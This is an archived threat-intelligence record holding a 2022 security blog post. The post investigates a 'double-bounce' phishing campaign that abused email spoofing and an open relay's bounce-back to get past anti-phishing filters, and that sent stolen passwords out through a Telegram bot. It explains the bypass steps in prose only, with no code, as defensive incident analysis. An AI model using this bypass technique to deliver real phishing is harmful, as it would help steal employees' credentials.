{
	"id": "651feae9-470c-4514-850c-780208e94cc4",
	"created_at": "2026-04-06T00:15:00.743016Z",
	"updated_at": "2026-04-10T13:11:19.594323Z",
	"deleted_at": null,
	"sha1_hash": "c9beb962707e94a359ef0e3603030556aa99699f",
	"title": "Double-bounced attacks with email spoofing – 2022 trends",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 817624,
	"plain_text": "Double-bounced attacks with email spoofing – 2022 trends\r\nBy Liora Itkin\r\nPublished: 2022-08-31 · Archived: 2026-04-05 16:31:00 UTC\r\nLiora Itkin | September 1, 2022 | 5 minute read\r\nPhishing is such a common means of cyber-attack, that enterprises routinely institute anti-phishing defense\r\nsystems and policies. Yet attackers bypass phishing defenses – by exploiting the bounce-back mechanism of email\r\nmessages.\r\nIn this post, I will share my activities step by step in uncovering what we’re calling a “double-bounced” attack –\r\nand show how a good employee awareness program helped one of our clients protect themselves from a wide-scale attack. Let’s take a deeper look at how this works.\r\nPhishing is such a common means of cyber-attack, that enterprises routinely institute anti-phishing\r\ndefense systems and policies. Yet attackers bypass phishing defenses – by exploiting the bounce-back\r\nmechanism of email messages\r\nWhat is email spoofing?\r\nhttps://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends\r\nPage 1 of 6\n\nTo exploit the bounce-back mechanism for email messages, an attacker spoofs the email address of the target user\r\n– forging the “FROM” field, so that the message:\r\nAppears to be from the target user\r\nIs sent to an unreachable destination\r\nWhen the recipient of a message is unreachable, Mailer-dameon@secureserver.net – an open-relay server that\r\nroutes messages to their destination – sends the message back to the sender.\r\nIn this case, because the attacker forged the “FROM” field in the email message header, the phishing message\r\ngoes straight to the target user – bypassing phishing policies.\r\nA case in point\r\nSince this is a common attack technique, most email vendors provide protection from email spoofing attacks.\r\nHowever, one of CyberProof’s enterprise clients that has this type of protection started to notice weird bounce-back emails being received by multiple employees. When asked, the employees said they had never sent the\r\nemails.\r\nBounced-back emails\r\nOn the surface, this email looks like a simple, bounced message:\r\nExample of a Bounced-Back Email\r\nInvestigation of the attachments, however, uncovered the fact that this was a user-targeted phishing attempt.\r\nThe attacker had developed a phishing HTML file, designed to steal user credentials:\r\nhttps://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends\r\nPage 2 of 6\n\nPhishing HTML file\r\nThe email addresses were found by our cyber threat intelligence (CTI) team in old leaks and data breaches by\r\nthird party applications, and the attacker used them in this attempt. Some of the users were not employees\r\nanymore.\r\nA deeper look at phishing files\r\nA deeper analysis of the phishing HTML attachments showed that after an employee fell for the phishing page and\r\nentered a password, the password was transferred to the attacker via Telegram API bot.\r\nThis indicates the use of Telegram Harvesting. The attacker used Telegram as a C2 server – first, stealing the\r\ncredentials of the organization’s employees, and then, transferring them to the C2 server.\r\nAnalysis of the HTML phishing page\r\nA deeper analysis of the phishing HTML attachments showed that after an employee fell for the\r\nphishing page and entered a password, the password was transferred to the attacker via Telegram API\r\nbot.\r\nIdentifying the bot name\r\nUsing Burp Suite, we checked the HTTP POST requests – which were sent after a fake password was entered in\r\nthe phishing page. We found the BOT name in one of the POST requests in the log of the response: asapcashBot\r\nhttps://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends\r\nPage 3 of 6\n\nInfo-stealing malwares are here to stay\r\nFortunately, there were no successful logins for targeted users in places that they shouldn’t have been. However, in\r\nthe AD failure logons, we found one anomaly that occurred two days before the phishing incident – AD blocked\r\nthose sign in attempts because they came from a malicious IP. Those attempts were to the same users that were\r\ntargeted in the phishing.\r\nWe checked the reputations of all the different IPs. One was found to be malicious on VirusTotal:\r\nOn AbuseIPDB, this IP is identified as a C2 server for the AZOrult malware – which is a well-known infostealer.\r\nhttps://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends\r\nPage 4 of 6\n\nAbuseIPDB\r\nWe can’t know for sure whether it’s the same attacker, it can be someone else who targeted the same users from\r\nthe same leak. This attacker tried to access the Office 365 Exchange Online app with the same user addresses\r\ntargeted by the phishing email and spread AZOrult malware inside Exchange.\r\nBypassing anti-phishing policies – “Double-Bounce”\r\nContinuing with the investigation, we analyzed how the attacker bypassed the email vendor’s anti-phishing policy.\r\nI discovered the use of a tricky approach that used the “double-bounce” technique:\r\nThe attacker sent an email to users with a spoofed FROM header (the user’s own email address) and\r\nattached fake .eml files.\r\nThe email was sent via open relay (secureserver.net) with an empty subject line.\r\nThe attachments were blocked on the client’s email gateway vendor by an anti-spoofing policy.\r\nThe email was bounced back to secureserver.net and then to the spoofed FROM email address, back to the\r\nclient’s mail gateway – which allowed them to pass through this time.\r\nInvesting in employee training reduces cyber risk\r\nhttps://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends\r\nPage 5 of 6\n\nAttackers always find different ways to bypass security policies. But in this case, the awareness and training of the\r\nemployees made all the difference.\r\nIn this organization, employees were all enrolled in a special anti-phishing training program, which warns them\r\nagainst clicking on attachments or links they don’t know.\r\nAttackers always find different ways to bypass security policies. But in this case, the awareness and\r\ntraining of the employees made all the difference\r\nThe results of this program are clear. The employee training – which focused on the importance of stopping cyber\r\nattacks – prevented this attack, and protected the organization from harm.\r\nInterested in learning about how to reduce the risk to an enterprise posed by phishing and other forms of attack?\r\nSpeak with an expert today!\r\nRecommended Posts\r\nLiora Itkin, Senior Security Expert at CyberProof. Liora is a part of CyberProof's global SOC, and is a\r\npoint of escalation during investigations and in providing recommendations for clients so they can improve\r\ntheir performance. Liora specializes in hands-on incident handling: detecting and responding to cyber\r\nincidents, conducting malware analysis, and proactively monitoring and reviewing threats and suspicious\r\nevents reported by clients. Liora has had a consistent track record of excellence starting with her service in\r\nthe Israeli Intelligence Corps, where she held the position of Head of the Cyber Security Department, in\r\nwhich role she managed and ran the SOC team and the DFIR and Threat Hunting teams.\r\nSource: https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends\r\nhttps://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends\r\nPage 6 of 6",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends"
	],
	"report_names": [
		"double-bounced-attacks-with-email-spoofing-2022-trends"
	],
	"threat_actors": [],
	"ts_created_at": 1775434500,
	"ts_updated_at": 1775826679,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/c9beb962707e94a359ef0e3603030556aa99699f.pdf",
		"text": "https://archive.orkl.eu/c9beb962707e94a359ef0e3603030556aa99699f.txt",
		"img": "https://archive.orkl.eu/c9beb962707e94a359ef0e3603030556aa99699f.jpg"
	}
}